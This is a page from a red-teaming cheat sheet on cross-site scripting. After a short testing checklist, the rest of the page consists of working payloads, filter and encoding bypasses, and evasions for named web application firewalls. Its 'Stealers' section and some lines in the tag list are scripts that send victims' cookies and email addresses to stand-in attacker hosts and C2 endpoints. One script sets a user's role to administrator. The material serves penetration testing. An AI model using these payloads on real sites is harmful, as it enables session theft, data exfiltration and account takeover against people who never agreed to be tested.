Red Teaming and Malware Analysis
@sirpedrotavaresseguranca-informatica.pt0xSI_f33d
Search…
About
Red Teaming
Cheat Sheet
Web
Misc
File Upload bypass
Authentication bypass
SQL Injection
XSS
XXE
Reverse-shell
Webshell
(De)Serialization
Active Directory
Services by port
Hardening
Stuff
Active Directory 101
Fuzzing and Web
Initial Foothold
Privilege Escalation (Privesc)
Lateral Movement (Pivoting)
Persistence
Command and Control (C&C)
Data Exfiltration
CVE & Exploits / CTF
Tools
Resources
Malware Analysis
Unpacking
Basic tips
Malware instrumentation with frida
Tools
Resources
Mobile
Tools
Reverse iOS ipa
Reverse Android APKs
Basic tips
Resources
IoT / Reverse / Firmware
Basic tips
Reverse IoT devices
Tools
Resources
Powered By GitBook
XSS
One thing you should understand when exploiting XSS is the behavior of the application towards specific payloads. The followings can be considered a checklist before exploiting XSS vulnerability:
  • Find the blacklisted/filtered characters. You can use XSS locators for this:
1
'';! - "<XSS>=&{()}
Copied!
  • Observe what tags are blocked by WAF and which keywords are allowed (iframe, img, body etc.)
  • Try Character Encoding (URL encoding, Double URL encoding, UTF-8 Unicode encoding, Long UTF-8 Unicode encoding, Hex encoding etc.)
  • Try XSS using HTML quote encapsulation
  • Try URL string evasion
  • Create the payload list according to the allowed keywords
  • Brute-force the application with the XSS payload list you just created

Payloads

1
XSS Locators:
2
'';!--"<XSS>=&{()}
3
4
Classic Payloads:
5
<svg onload=alert(1)>
6
"><svg onload=alert(1)>
7
<iframe src="javascript:alert(1)">
8
"><script src=data:&comma;alert(1)//
9
10
script tag filter bypass:
11
<svg/onload=alert(1)>
12
<script>alert(1)</script>
13
<script >alert(1)</script>
14
<ScRipT>alert(1)</sCriPt>
15
<%00script>alert(1)</script>
16
<script>al%00ert(1)</script>
17
18
HTML tags:
19
<img/src=x a='' onerror=alert(1)>
20
<IMG """><SCRIPT>alert(1)</SCRIPT>">
21
<img src=`x`onerror=alert(1)>
22
<img src='/' onerror='alert("kalisa")'>
23
<IMG SRC=# onmouseover="alert('xxs')">
24
<IMG SRC= onmouseover="alert('xxs')">
25
<IMG onmouseover="alert('xxs')">
26
<BODY ONLOAD=alert('XSS')>
27
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
28
<SCRIPT SRC=http:/evil.com/xss.js?< B >
29
"><XSS<test accesskey=x onclick=alert(1)//test
30
<svg><discard onbegin=alert(1)>
31
<script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script>
32
<script>image = new Image(); image.src="http://"+document.cookie+"evil.com/";</script>
33
34
Other tags:
35
<BASE HREF="javascript:alert('XSS');//">
36
<DIV STYLE="width: expression(alert('XSS'));">
37
<TABLE BACKGROUND="javascript:alert('XSS')">
38
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
39
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
40
<xss id=x tabindex=1 onactivate=alert(1)></xss>
41
<xss onclick="alert(1)">test</xss>
42
<xss onmousedown="alert(1)">test</xss>
43
<body onresize=alert(1)>”onload=this.style.width=‘100px’>
44
<xss id=x onfocus=alert(document.cookie)tabindex=1>#x’;</script>
45
46
CharCode:
47
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
48
49
if the input is already in script tag:
50
@domain.com">user+'-alert`1`-'@domain.com
51
52
AngularJS:
53
{{constructor.constructor('alert(1)')()}}
54
{{$on.constructor('alert(1)')()}}
55
{{{}.")));alert(1)//"}}
56
{{{}.")));alert(1)//"}}
57
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11 4,116,40,49,41)
58
59
Scriptless:
60
<link rel=icon href="//evil?
61
<iframe src="//evil?
62
<iframe src="//evil?
63
<input type=hidden type=image src="//evil?
64
65
Unclosed Tags:
66
<svg onload=alert(1)//
67
68
DOM XSS:
69
“><svg onload=alert(1)>
70
<img src=1 onerror=alert(1)>
71
javascript:alert(document.cookie)
72
\“-alert(1)}//
73
<><img src=1 onerror=alert(1)>
74
75
Another case:
76
param=abc`;return+false});});alert`xss`;</script>
77
abc`; Finish the string
78
return+false}); Finish the jQuery click function
79
}); Finish the jQuery ready function
80
alert`xss`; Here we can execute our code
81
</script> This closes the script tag to prevent JavaScript parsing errors
Copied!

Restrictions Bypas

1
No parentheses:
2
<script>onerror=alert;throw 1</script>
3
<script>throw onerror=eval,'=alert\x281\x29'</script>
4
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
5
<script>location='javascript:alert\x281\x29'</script>
6
<script>alert`1`</script>
7
<script>new Function`X${document.location.hash.substr`1`}`</script>
8
9
No parentheses and no semicolons:
10
<script>{onerror=alert}throw 1</script>
11
<script>throw onerror=alert,1</script>
12
<script>onerror=alert;throw 1337</script>
13
<script>{onerror=alert}throw 1337</script>
14
<script>throw onerror=alert,'some string',123,'haha'</script>
15
16
No parentheses and no spaces:
17
<script>Function`X${document.location.hash.substr`1`}```</script>
18
19
Angle brackets HTML encoded (in an attribute):
20
“onmouseover=“alert(1)
21
‘-alert(1)-’
22
23
If quote is escaped:
24
‘}alert(1);{‘
25
‘}alert(1)%0A{‘
26
\’}alert(1);{//
27
28
Embedded tab, newline, carriage return to break up XSS:
29
<IMG SRC="jav&#x09;ascript:alert('XSS');">
30
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
31
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
32
33
Other:
34
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>: base64 value which is alert(‘XSS’)
35
Copied!

Encoding

1
Unicode:
2
<script>\u0061lert(1)</script>
3
<script>\u{61}lert(1)</script>
4
<script>\u{0000000061}lert(1)</script>
5
6
Hex:
7
<script>eval('\x61lert(1)')</script>
8
9
HTML:
10
<svg><script>&#97;lert(1)</script></svg>
11
<svg><script>&#x61;lert(1)</script></svg>
12
<svg><script>alert&NewLine;(1)</script></svg>
13
<svg><script>x="&quot;,alert(1)//";</script></svg>
14
\’-alert(1)//
15
16
URL:
17
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
18
19
Double URL Encode:
20
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
21
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
22
23
Unicode + HTML:
24
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
25
26
HTML + URL:
27
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
28
Copied!

WAF Bypass

1
Imperva Incapsula:
2
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E
3
<img/src="x"/onerror="[JS-F**K Payload]">
4
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
5
6
WebKnight:
7
<details ontoggle=alert(1)>
8
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
9
10
F5 Big IP:
11
<body style="height:1000px" onwheel="[DATA]">
12
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
13
<body style="height:1000px" onwheel="[JS-F**k Payload]">
14
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
15
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
16
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
17
18
Barracuda WAF:
19
<body style="height:1000px" onwheel="alert(1)">
20
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
21
22
PHP-IDS:
23
<svg+onload=+"[DATA]"
24
<svg+onload=+"aler%25%37%34(1)"
25
26
Mod-Security:
27
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>
28
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
29
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
30
31
Quick Defense:
32
<input type="search" onsearch="aler\u0074(1)">
33
<details ontoggle="aler\u0074(1)">
34
35
Sucuri WAF:
36
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
37
Copied!

Stealers

1
--stored--
2
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
3
4
<script>
5
document.write('<img src="[URL]?c='+document.cookie+'" />');
6
</script>
7
8
--reflected--
9
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>
10
11
---ninja 1----
12
<script>
13
fetch('https://awdawddawawdd.burpcollaborator.net', {
14
method: 'POST',
15
mode: 'no-cors',
16
body:document.cookie
17
});
18
</script>
19
20
----script 1--GET METHOD----
21
// get some info from a GET request
22
var a = new XMLHttpRequest();
23
a.open("GET", "https://lol.php?xxx=1&ajax=full_email_address", false);
24
a.withCredentials = true;
25
a.send();
26
var email=a.response;
27
28
// exfiltrate to C2
29
var b = new XMLHttpRequest();
30
b.open("GET", "https://xxxxxxxx.ngrok.io/?email="+email);
31
b.send();
32
33
34
---script 2---POST METHOD---
35
// set something
36
var a = new XMLHttpRequest();
37
a.open("POST", "https://xxxx.php?xxxx=1&screen=settings&role=administrator&action=save", false);
38
a.withCredentials = true;
39
a.send("send_email=on&receive_money=on");
40
Copied!

Other lists

https://owasp.org/www-community/xss-filter-evasion-cheatsheet
owasp.org
Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy
WebSecAcademy
XSS (Cross Site Scripting)
HackTricks

Tools

See XSS tools here:
Web Discovery
Red Teaming and Malware Analysis
BeEF - The Browser Exploitation Framework Project

References

A Pentester’s Guide to Cross-Site Scripting (XSS) | Cobalt Blog
Cobalt
Previous
SQL Injection
Next
XXE
Last modified 10mo ago
Copy link
Contents
Payloads
Restrictions Bypas
Encoding
WAF Bypass
Stealers
Other lists
Tools
References